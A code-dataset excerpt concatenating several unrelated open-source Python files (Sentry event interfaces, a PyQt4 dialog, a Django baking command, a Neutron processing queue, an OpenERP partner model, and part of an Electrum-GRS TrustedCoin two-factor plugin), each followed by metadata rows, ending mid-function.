>>> }
>>> }]
Values should be sent oldest to newest, this includes both the stacktrace
and the exception itself.
.. note:: This interface can be passed as the 'exception' key in addition
to the full interface path.
"""
attrs = ('values',)
score = 2000
def __init__(self, *args, **kwargs):
if 'values' in kwargs:
values = kwargs['values']
elif not kwargs and len(args) == 1 and isinstance(args[0], (list, tuple)):
values = args[0]
else:
values = [kwargs]
self.values = [SingleException(**e) for e in values]
def __getitem__(self, key):
return self.values[key]
def __iter__(self):
return iter(self.values)
def __len__(self):
return len(self.values)
def validate(self):
for exception in self.values:
# ensure we've got the correct required values
exception.validate()
def serialize(self):
return {
'values': [e.serialize() for e in self.values]
}
def unserialize(self, data):
if 'values' not in data:
data = {'values': [data]}
data['values'] = [unserialize(SingleException, v) for v in data['values']]
return data
def get_hash(self):
return self.values[0].get_hash()
def get_composite_hash(self, interfaces):
return self.values[0].get_composite_hash(interfaces)
def get_context(self, event, is_public=False, **kwargs):
newest_first = is_newest_frame_first(event)
context_kwargs = {
'event': event,
'is_public': is_public,
'newest_first': newest_first,
}
exceptions = []
last = len(self.values) - 1
for num, e in enumerate(self.values):
context = e.get_context(**context_kwargs)
if e.stacktrace:
context['stacktrace'] = e.stacktrace.get_context(
with_stacktrace=False, **context_kwargs)
else:
context['stacktrace'] = {}
context['stack_id'] = 'exception_%d' % (num,)
context['is_root'] = num == last
exceptions.append(context)
if newest_first:
exceptions.reverse()
return {
'newest_first': newest_first,
'system_frames': sum(e['stacktrace'].get('system_frames', 0) for e in exceptions),
'exceptions': exceptions,
'stacktrace': self.get_stacktrace(event, newest_first=newest_first)
}
def to_html(self, event, **kwargs):
if not self.values:
return ''
if len(self.values) == 1 and not self.values[0].stacktrace:
exception = self.values[0]
context = exception.get_context(event=event, **kwargs)
return render_to_string('sentry/partial/interfaces/exception.html', context)
context = self.get_context(event=event, **kwargs)
return render_to_string('sentry/partial/interfaces/chained_exception.html', context)
def to_string(self, event, is_public=False, **kwargs):
return self.get_stacktrace(event, system_frames=False, max_frames=5)
def get_search_context(self, event):
return self.values[0].get_search_context(event)
def get_stacktrace(self, *args, **kwargs):
exc = self.values[0]
if exc.stacktrace:
return exc.stacktrace.get_stacktrace(*args, **kwargs)
return ''
class Http(Interface):
"""
The Request information is stored in the Http interface. Two arguments
are required: ``url`` and ``method``.
The ``env`` variable is a compounded dictionary of HTTP headers as well
as environment information passed from the webserver. Sentry will explicitly
look for ``REMOTE_ADDR`` in ``env`` for things which require an IP address.
The ``data`` variable should only contain the request body (not the query
string). It can either be a dictionary (for standard HTTP requests) or a
raw request body.
>>> {
>>> "url": "http://absolute.uri/foo",
>>> "method": "POST",
>>> "data": {
>>> "foo": "bar"
>>> },
>>> "query_string": "hello=world",
>>> "cookies": "foo=bar",
>>> "headers": {
>>> "Content-Type": "text/html"
>>> },
>>> "env": {
>>> "REMOTE_ADDR": "192.168.0.1"
>>> }
>>> }
.. note:: This interface can be passed as the 'request' key in addition
to the full interface path.
"""
attrs = ('url', 'method', 'data', 'query_string', 'cookies', 'headers',
'env')
display_score = 1000
score = 800
# methods as defined by http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html + PATCH
METHODS = ('GET', 'POST', 'PUT', 'OPTIONS', 'HEAD', 'DELETE', 'TRACE', 'CONNECT', 'PATCH')
def __init__(self, url, method=None, data=None, query_string=None, cookies=None, headers=None, env=None, **kwargs):
if data is None:
data = {}
if method:
method = method.upper()
urlparts = urlparse.urlsplit(url)
if not query_string:
# define querystring from url
query_string = urlparts.query
elif query_string.startswith('?'):
# remove '?' prefix
query_string = query_string[1:]
self.url = '%s://%s%s' % (urlparts.scheme, urlparts.netloc, urlparts.path)
self.method = method
self.data = data
self.query_string = query_string
if cookies:
self.cookies = cookies
else:
self.cookies = {}
# if cookies were a string, convert to a dict
# parse_qsl will parse both acceptable formats:
# a=b&c=d
# and
# a=b; c=d
if isinstance(self.cookies, basestring):
self.cookies = dict(urlparse.parse_qsl(self.cookies, keep_blank_values=True))
# if cookies were [also] included in headers we
# strip them out
if headers and 'Cookie' in headers:
cookies = headers.pop('Cookie')
if cookies:
self.cookies = cookies
self.headers = headers or {}
self.env = env or {}
def serialize(self):
return {
'url': self.url,
'method': self.method,
'data': self.data,
'query_string': self.query_string,
'cookies': self.cookies,
'headers': self.headers,
'env': self.env,
}
def to_string(self, event, is_public=False, **kwargs):
return render_to_string('sentry/partial/interfaces/http.txt', {
'event': event,
'full_url': '?'.join(filter(bool, [self.url, self.query_string])),
'url': self.url,
'method': self.method,
'query_string': self.query_string,
})
def _to_dict(self, value):
if value is None:
value = {}
if isinstance(value, dict):
return True, value
try:
value = QueryDict(value)
except _Exception:
return False, value
else:
return True, value
def to_html(self, event, is_public=False, **kwargs):
data = self.data
headers_is_dict, headers = self._to_dict(self.headers)
# educated guess as to whether the body is normal POST data
if headers_is_dict and headers.get('Content-Type') == 'application/x-www-form-urlencoded' and '=' in data:
_, data = self._to_dict(data)
context = {
'is_public': is_public,
'event': event,
'full_url': '?'.join(filter(bool, [self.url, self.query_string])),
'url': self.url,
'method': self.method,
'data': data,
'query_string': self.query_string,
'headers': self.headers,
}
if not is_public:
# It's kind of silly we store this twice
_, cookies = self._to_dict(self.cookies)
context.update({
'cookies': cookies,
'env': self.env,
})
return render_to_string('sentry/partial/interfaces/http.html', context)
def get_title(self):
return _('Request')
def get_search_context(self, event):
return {
'filters': {
'url': [self.url],
}
}
class Template(Interface):
"""
A rendered template (generally used like a single frame in a stacktrace).
The attributes ``filename``, ``context_line``, and ``lineno`` are required.
>>> {
>>> "abs_path": "/real/file/name.html"
>>> "filename": "file/name.html",
>>> "pre_context": [
>>> "line1",
>>> "line2"
>>> ],
>>> "context_line": "line3",
>>> "lineno": 3,
>>> "post_context": [
>>> "line4",
>>> "line5"
>>> ],
>>> }
.. note:: This interface can be passed as the 'template' key in addition
to the full interface path.
"""
attrs = ('filename', 'context_line', 'lineno', 'pre_context', 'post_context',
'abs_path')
score = 1100
def __init__(self, filename, context_line, lineno, pre_context=None, post_context=None,
abs_path=None, **kwargs):
self.abs_path = abs_path
self.filename = filename
self.context_line = context_line
self.lineno = int(lineno)
self.pre_context = pre_context
self.post_context = post_context
def serialize(self):
return {
'abs_path': self.abs_path,
'filename': self.filename,
'context_line': self.context_line,
'lineno': self.lineno,
'pre_context': self.pre_context,
'post_context': self.post_context,
}
def get_hash(self):
return [self.filename, self.context_line]
def to_string(self, event, is_public=False, **kwargs):
context = get_context(
lineno=self.lineno,
context_line=self.context_line,
pre_context=self.pre_context,
post_context=self.post_context,
filename=self.filename,
format=False,
)
result = [
'Stacktrace (most recent call last):', '',
self.get_traceback(event, context)
]
return '\n'.join(result)
def to_html(self, event, is_public=False, **kwargs):
context = get_context(
lineno=self.lineno,
context_line=self.context_line,
pre_context=self.pre_context,
post_context=self.post_context,
filename=self.filename,
format=True,
)
return render_to_string('sentry/partial/interfaces/template.html', {
'event': event,
'abs_path': self.abs_path,
'filename': self.filename,
'lineno': int(self.lineno),
'start_lineno': context[0][0],
'context': context,
'template': self.get_traceback(event, context),
'is_public': is_public,
})
def get_traceback(self, event, context):
result = [
event.message, '',
'File "%s", line %s' % (self.filename, self.lineno), '',
]
result.extend([n[1].strip('\n') for n in context])
return '\n'.join(result)
def get_search_context(self, event):
return {
'text': [self.abs_path, self.filename, self.context_line],
}
class User(Interface):
"""
An interface which describes the authenticated User for a request.
All data is arbitrary and optional other than the ``id``
field which should be a string representing the user's unique identifier.
>>> {
>>> "id": "unique_id",
>>> "username": "my_user",
>>> "email": "foo@example.com"
>>> }
"""
attrs = ('id', 'email', 'username', 'data')
def __init__(self, id=None, email=None, username=None, **kwargs):
self.id = id
self.email = email
self.username = username
self.data = kwargs
def serialize(self):
# XXX: legacy -- delete
if hasattr(self, 'is_authenticated'):
self.data['is_authenticated'] = self.is_authenticated
return {
'id': self.id,
'username': self.username,
'email': self.email,
'data': self.data,
}
def get_hash(self):
return []
def to_html(self, event, is_public=False, **kwargs):
if is_public:
return ''
return render_to_string('sentry/partial/interfaces/user.html', {
'is_public': is_public,
'event': event,
'user_id': self.id,
'user_username': self.username,
'user_email': self.email,
'user_data': self.data,
})
def get_search_context(self, event):
tokens = filter(bool, [self.id, self.username, self.email])
if not tokens:
return {}
return {
'text': tokens
}
|
bsd-3-clause
| 8,498,770,027,748,643,000
| 29.424893
| 119
| 0.551136
| false
| 4.132082
| false
| false
| false
|
xcgspring/XSTAF
|
XSTAF/ui/ui_confirmDialog.py
|
1
|
2148
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'confirmDialog.ui'
#
# Created: Fri Jun 05 09:54:07 2015
# by: PyQt4 UI code generator 4.11.3
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_confirmDialog(object):
def setupUi(self, confirmDialog):
confirmDialog.setObjectName(_fromUtf8("confirmDialog"))
confirmDialog.resize(398, 60)
self.gridLayout = QtGui.QGridLayout(confirmDialog)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.noButton = QtGui.QPushButton(confirmDialog)
self.noButton.setObjectName(_fromUtf8("noButton"))
self.gridLayout.addWidget(self.noButton, 1, 2, 1, 1)
self.yesButton = QtGui.QPushButton(confirmDialog)
self.yesButton.setObjectName(_fromUtf8("yesButton"))
self.gridLayout.addWidget(self.yesButton, 1, 1, 1, 1)
spacerItem = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.gridLayout.addItem(spacerItem, 1, 0, 1, 1)
self.messageLabel = QtGui.QLabel(confirmDialog)
self.messageLabel.setObjectName(_fromUtf8("messageLabel"))
self.gridLayout.addWidget(self.messageLabel, 0, 0, 1, 3)
self.retranslateUi(confirmDialog)
QtCore.QMetaObject.connectSlotsByName(confirmDialog)
def retranslateUi(self, confirmDialog):
confirmDialog.setWindowTitle(_translate("confirmDialog", "Dialog", None))
self.noButton.setText(_translate("confirmDialog", "No", None))
self.yesButton.setText(_translate("confirmDialog", "Yes", None))
self.messageLabel.setText(_translate("confirmDialog", "TextLabel", None))
|
apache-2.0
| -5,367,792,330,494,818,000
| 40.307692
| 102
| 0.705773
| false
| 3.905455
| false
| false
| false
|
deannariddlespur/django-baker
|
django_baker/management/commands/bake.py
|
1
|
2636
|
from __future__ import print_function
from django.core.management.base import BaseCommand, CommandError
from django.core.exceptions import ImproperlyConfigured
from django.db.models import get_app, get_models
from django.db.models.loading import get_model
from ...bakery import Baker
class Command(BaseCommand):
args = "appname:modelname,modelname2,modelname3"
help = ("Generates generic views (create, update, detail, list, and delete), urls, forms, and admin for model in an"
"app. Optionally can restrict which apps are generated on a per app basis.\n\nexample: python manage.py "
"bake bread:Sesame,Pumpkernickel donut:Glazed,Chocolate")
def handle(self, *args, **options):
ingredients = self.parse_bake_options(*args)
baker = Baker()
baker.bake(ingredients)
def parse_bake_options(self, *args):
"""
Parses command line options to determine what apps and models for those apps we should bake.
"""
apps_and_models_to_bake = {}
for arg in args:
app_and_model_names = arg.split(':')
app_label = app_and_model_names[0]
if len(app_and_model_names) == 2:
selected_model_names = app_and_model_names[1].split(",")
else:
selected_model_names = None
app, models = self.get_app_and_models(app_label, selected_model_names)
apps_and_models_to_bake[app_label] = models
return apps_and_models_to_bake
def get_app_and_models(self, app_label, model_names):
"""
Gets the app and models when given app_label and model names
"""
try:
app = get_app(app_label)
except ImproperlyConfigured:
raise CommandError("%s is ImproperlyConfigured - did you remember to add %s to settings.INSTALLED_APPS?" %
(app_label, app_label))
models = self.get_selected_models(app, app_label, model_names)
return (app, models)
def get_selected_models(self, app, app_label, model_names):
"""
        Returns the models for a given app. If given model_names, returns those so long as the model names are
actually models in the given app.
"""
if model_names:
try:
print(app_label, model_names)
return [get_model(app_label, model_name) for model_name in model_names]
except:
raise CommandError("One or more of the models you entered for %s are incorrect." % app_label)
else:
return get_models(app)
|
bsd-3-clause
| 8,704,876,466,907,126,000
| 42.933333
| 120
| 0.616844
| false
| 3.975867
| false
| false
| false
|
noironetworks/neutron
|
neutron/agent/common/resource_processing_queue.py
|
1
|
6194
|
# Copyright 2014 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import datetime
from oslo_utils import timeutils
from six.moves import queue as Queue
class ResourceUpdate(object):
"""Encapsulates a resource update
An instance of this object carries the information necessary to prioritize
and process a request to update a resource.
Priority values are ordered from higher (0) to lower (>0) by the caller,
    and are therefore not defined here, but must be defined by the consumer.
"""
def __init__(self, id, priority,
action=None, resource=None, timestamp=None, tries=5):
self.priority = priority
self.timestamp = timestamp
if not timestamp:
self.timestamp = timeutils.utcnow()
self.id = id
self.action = action
self.resource = resource
self.tries = tries
def __lt__(self, other):
"""Implements priority among updates
Lower numerical priority always gets precedence. When comparing two
updates of the same priority then the one with the earlier timestamp
gets precedence. In the unlikely event that the timestamps are also
equal it falls back to a simple comparison of ids meaning the
precedence is essentially random.
"""
if self.priority != other.priority:
return self.priority < other.priority
if self.timestamp != other.timestamp:
return self.timestamp < other.timestamp
return self.id < other.id
def hit_retry_limit(self):
return self.tries < 0
class ExclusiveResourceProcessor(object):
"""Manager for access to a resource for processing
This class controls access to a resource in a non-blocking way. The first
instance to be created for a given ID is granted exclusive access to
the resource.
Other instances may be created for the same ID while the first
instance has exclusive access. If that happens then it doesn't block and
wait for access. Instead, it signals to the master instance that an update
came in with the timestamp.
This way, a thread will not block to wait for access to a resource.
Instead it effectively signals to the thread that is working on the
resource that something has changed since it started working on it.
That thread will simply finish its current iteration and then repeat.
This class keeps track of the last time that resource data was fetched and
processed. The timestamp that it keeps must be before when the data used
to process the resource last was fetched from the database. But, as close
as possible. The timestamp should not be recorded, however, until the
resource has been processed using the fetch data.
"""
_masters = {}
_resource_timestamps = {}
def __init__(self, id):
self._id = id
if id not in self._masters:
self._masters[id] = self
self._queue = []
self._master = self._masters[id]
def _i_am_master(self):
return self == self._master
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
if self._i_am_master():
del self._masters[self._id]
def _get_resource_data_timestamp(self):
return self._resource_timestamps.get(self._id,
datetime.datetime.min)
def fetched_and_processed(self, timestamp):
"""Records the timestamp after it is used to update the resource"""
new_timestamp = max(timestamp, self._get_resource_data_timestamp())
self._resource_timestamps[self._id] = new_timestamp
def queue_update(self, update):
"""Queues an update from a worker
This is the queue used to keep new updates that come in while a
resource is being processed. These updates have already bubbled to
the front of the ResourceProcessingQueue.
"""
self._master._queue.append(update)
def updates(self):
"""Processes the resource until updates stop coming
Only the master instance will process the resource. However, updates
may come in from other workers while it is in progress. This method
loops until they stop coming.
"""
if self._i_am_master():
while self._queue:
# Remove the update from the queue even if it is old.
update = self._queue.pop(0)
# Process the update only if it is fresh.
if self._get_resource_data_timestamp() < update.timestamp:
yield update
class ResourceProcessingQueue(object):
"""Manager of the queue of resources to process."""
def __init__(self):
self._queue = Queue.PriorityQueue()
def add(self, update):
update.tries -= 1
self._queue.put(update)
def each_update_to_next_resource(self):
"""Grabs the next resource from the queue and processes
This method uses a for loop to process the resource repeatedly until
updates stop bubbling to the front of the queue.
"""
next_update = self._queue.get()
with ExclusiveResourceProcessor(next_update.id) as rp:
# Queue the update whether this worker is the master or not.
rp.queue_update(next_update)
# Here, if the current worker is not the master, the call to
# rp.updates() will not yield and so this will essentially be a
# noop.
for update in rp.updates():
yield (rp, update)
|
apache-2.0
| 4,223,049,414,664,777,700
| 36.539394
| 79
| 0.652406
| false
| 4.584752
| false
| false
| false
|
open-synergy/opnsynid-partner-contact
|
partner_app/models/res_partner.py
|
1
|
1107
|
# -*- coding: utf-8 -*-
# Copyright 2017 OpenSynergy Indonesia
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from openerp import models, api
class ResPartner(models.Model):
_inherit = "res.partner"
@api.multi
def button_toggle_customer(self):
for partner in self:
partner._toggle_customer()
@api.multi
def button_toggle_supplier(self):
for partner in self:
partner._toggle_supplier()
@api.multi
def _toggle_customer(self):
self.ensure_one()
criteria = [
"|",
("id", "=", self.id),
("commercial_partner_id", "=", self.id),
]
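        # Flip the flag on this partner and on every contact sharing the same
        # commercial entity, so the whole record set stays consistent.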
self.env["res.partner"].search(criteria).write({
"customer": not self.customer,
})
@api.multi
def _toggle_supplier(self):
self.ensure_one()
criteria = [
"|",
("id", "=", self.id),
("commercial_partner_id", "=", self.id),
]
self.env["res.partner"].search(criteria).write({
"supplier": not self.supplier,
})
|
agpl-3.0
| -3,164,423,185,243,750,400
| 24.744186
| 63
| 0.528455
| false
| 3.817241
| false
| false
| false
|
GroestlCoin/electrum-grs
|
electrum_grs/plugins/trustedcoin/trustedcoin.py
|
1
|
31657
|
#!/usr/bin/env python
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import socket
import json
import base64
import time
import hashlib
from collections import defaultdict
from typing import Dict, Union
from urllib.parse import urljoin
from urllib.parse import quote
from aiohttp import ClientResponse
from electrum_grs import ecc, constants, keystore, version, bip32, bitcoin
from electrum_grs.bitcoin import TYPE_ADDRESS
from electrum_grs.bip32 import BIP32Node, xpub_type
from electrum_grs.crypto import sha256
from electrum_grs.transaction import TxOutput
from electrum_grs.mnemonic import Mnemonic, seed_type, is_any_2fa_seed_type
from electrum_grs.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum_grs.i18n import _
from electrum_grs.plugin import BasePlugin, hook
from electrum_grs.util import NotEnoughFunds, UserFacingException
from electrum_grs.storage import STO_EV_USER_PW
from electrum_grs.network import Network
from electrum_grs.base_wizard import BaseWizard
from electrum_grs.logging import Logger
def get_signing_xpub(xtype):
if not constants.net.TESTNET:
xpub = "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
else:
xpub = "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
if xtype not in ('standard', 'p2wsh'):
raise NotImplementedError('xtype: {}'.format(xtype))
if xtype == 'standard':
return xpub
node = BIP32Node.from_xkey(xpub)
return node._replace(xtype=xtype).to_xpub()
def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
KIVY_DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"To use it, you must have a separate device with Google Authenticator."),
_("This service uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. A small fee will be charged on each transaction that uses the "
"remote server."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class ErrorConnectingServer(Exception):
def __init__(self, reason: Union[str, Exception] = None):
self.reason = reason
def __str__(self):
header = _("Error connecting to {} server").format('TrustedCoin')
reason = self.reason
if isinstance(reason, BaseException):
reason = repr(reason)
return f"{header}:\n{reason}" if reason else header
class TrustedCoinCosignerClient(Logger):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
Logger.__init__(self)
async def handle_response(self, resp: ClientResponse):
if resp.status != 200:
try:
r = await resp.json()
message = r['message']
except:
message = await resp.text()
raise TrustedCoinException(message, resp.status)
try:
return await resp.json()
except:
return await resp.text()
def send_request(self, method, relative_url, data=None, *, timeout=None):
network = Network.get_instance()
if not network:
raise ErrorConnectingServer('You are offline.')
url = urljoin(self.base_url, relative_url)
if self.debug:
self.logger.debug(f'<-- {method} {url} {data}')
headers = {}
if self.user_agent:
headers['user-agent'] = self.user_agent
try:
if method == 'get':
response = Network.send_http_on_proxy(method, url,
params=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
elif method == 'post':
response = Network.send_http_on_proxy(method, url,
json=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
else:
assert False
except TrustedCoinException:
raise
except Exception as e:
raise ErrorConnectingServer(e)
else:
if self.debug:
self.logger.debug(f'--> {response}')
return response
def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a plain/text unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
        Attempt to have a particular cosigner sign a transaction.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload,
timeout=60)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
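# A short usage sketch of the client above (ids, hex and OTP values are made up,
# and a running Network instance is required for any request to go through):
#
#   client = TrustedCoinCosignerClient(user_agent="Electrum/x.y.z")
#   tos = client.get_terms_of_service()      # plain-text terms of service
#   info = client.get("0f3c...")             # billing info for a cosigner short_id
#   signed = client.sign("0f3c...", raw_tx_hex, otp=123456)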
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.ELECTRUM_VERSION)
class Wallet_2fa(Multisig_Wallet):
wallet_type = '2fa'
def __init__(self, storage):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, storage)
self.is_billing = False
self.billing_info = None
self._load_billing_addresses()
def _load_billing_addresses(self):
billing_addresses = {
'legacy': self.storage.get('trustedcoin_billing_addresses', {}),
'segwit': self.storage.get('trustedcoin_billing_addresses_segwit', {})
}
self._billing_addresses = {} # type: Dict[str, Dict[int, str]] # addr_type -> index -> addr
self._billing_addresses_set = set() # set of addrs
for addr_type, d in list(billing_addresses.items()):
self._billing_addresses[addr_type] = {}
# convert keys from str to int
for index, addr in d.items():
self._billing_addresses[addr_type][int(index)] = addr
self._billing_addresses_set.add(addr)
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.storage)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self, config):
default = self.min_prepay()
n = config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
def extra_fee(self, config):
if self.can_sign_without_server():
return 0
if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay(config)
price = int(self.price_per_tx[n])
if price > 100000 * n:
raise Exception('too high trustedcoin fee ({} for {} txns)'.format(price, n))
return price
def make_unsigned_transaction(self, coins, outputs, config, fixed_fee=None,
change_addr=None, is_sweep=False):
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins, o, config, fixed_fee, change_addr)
fee = self.extra_fee(config) if not is_sweep else 0
if fee:
address = self.billing_info['billing_address_segwit']
fee_output = TxOutput(TYPE_ADDRESS, address, fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
                # TrustedCoin won't charge if the total input value is
                # lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= fee:
raise
self.logger.info("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
def on_otp(self, tx, otp):
if not otp:
self.logger.info("sign_transaction: no auth code")
return
otp = int(otp)
long_user_id, short_id = self.get_user_id()
raw_tx = tx.serialize()
try:
r = server.sign(short_id, raw_tx, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
raise UserFacingException(_('Invalid one-time password.')) from e
else:
raise
if r:
raw_tx = r.get('transaction')
tx.update(raw_tx)
self.logger.info(f"twofactor: is complete {tx.is_complete()}")
# reset billing_info
self.billing_info = None
self.plugin.start_request_thread(self)
def add_new_billing_address(self, billing_index: int, address: str, addr_type: str):
billing_addresses_of_this_type = self._billing_addresses[addr_type]
saved_addr = billing_addresses_of_this_type.get(billing_index)
if saved_addr is not None:
if saved_addr == address:
return # already saved this address
else:
raise Exception('trustedcoin billing address inconsistency.. '
'for index {}, already saved {}, now got {}'
.format(billing_index, saved_addr, address))
# do we have all prior indices? (are we synced?)
largest_index_we_have = max(billing_addresses_of_this_type) if billing_addresses_of_this_type else -1
if largest_index_we_have + 1 < billing_index: # need to sync
for i in range(largest_index_we_have + 1, billing_index):
addr = make_billing_address(self, i, addr_type=addr_type)
billing_addresses_of_this_type[i] = addr
self._billing_addresses_set.add(addr)
# save this address; and persist to disk
billing_addresses_of_this_type[billing_index] = address
self._billing_addresses_set.add(address)
self._billing_addresses[addr_type] = billing_addresses_of_this_type
self.storage.put('trustedcoin_billing_addresses', self._billing_addresses['legacy'])
self.storage.put('trustedcoin_billing_addresses_segwit', self._billing_addresses['segwit'])
# FIXME this often runs in a daemon thread, where storage.write will fail
self.storage.write()
def is_billing_address(self, addr: str) -> bool:
return addr in self._billing_addresses_set
# Utility functions
def get_user_id(storage):
def make_long_id(xpub_hot, xpub_cold):
return sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = storage.get('x1/')['xpub']
xpub2 = storage.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
def make_xpub(xpub, s) -> str:
rootnode = BIP32Node.from_xkey(xpub)
